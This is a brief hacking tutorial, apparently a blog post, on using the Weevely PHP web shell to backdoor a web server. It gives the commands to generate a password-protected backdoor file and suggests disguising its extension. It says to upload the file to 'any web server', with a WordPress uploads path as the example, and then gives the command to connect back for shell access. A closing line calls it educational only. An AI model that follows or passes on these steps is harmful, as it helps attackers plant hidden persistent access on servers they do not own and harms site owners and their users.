Backdooring Server Via Weevely

Weevely is a stealth PHP web shell that simulate an SSH-like connection. It is an essential tool for web application post exploitation, and can be used as stealth backdoor or as a web shell to manage legit web accounts, even free hosted ones. 
You can Download weevely from  : Weevely Download


First run Weevely.

Run the following command  :

python weevely.py generate [PASSWORD]  [location]/filename.php 

For example :

python weevely.py generate nepal123  /home/lamgade/Desktop/uban.php

 ”nepal123″ is my password. “uban.php” is my filename.   You can keep any filename.php. You can keep other extension like “.htaccess” , “.img”

Now “uban.php” is a backdoor.

Once you have generated the backdoor, upload your backdoor in any web server and just use the following command to back connect.

For example i have uploaded backdoor in my localhost. And here is the backdoor location.

http://localhost/wordpress/wp-content/uploads/2014/04/uban.php 

And now my weevely command to back connect will be :

python weevely.py [URL OF THE BACKDOOR] [PASSWORD OF THE BACKDOOR]

python weevely.py http://localhost/wordpress/wpcontent/uploads/2014/04/uban.php nepal123

And when i connect it will give me the backdoor access.

Note : This tutorial is only for education purpose. I am not responsible for any action you do.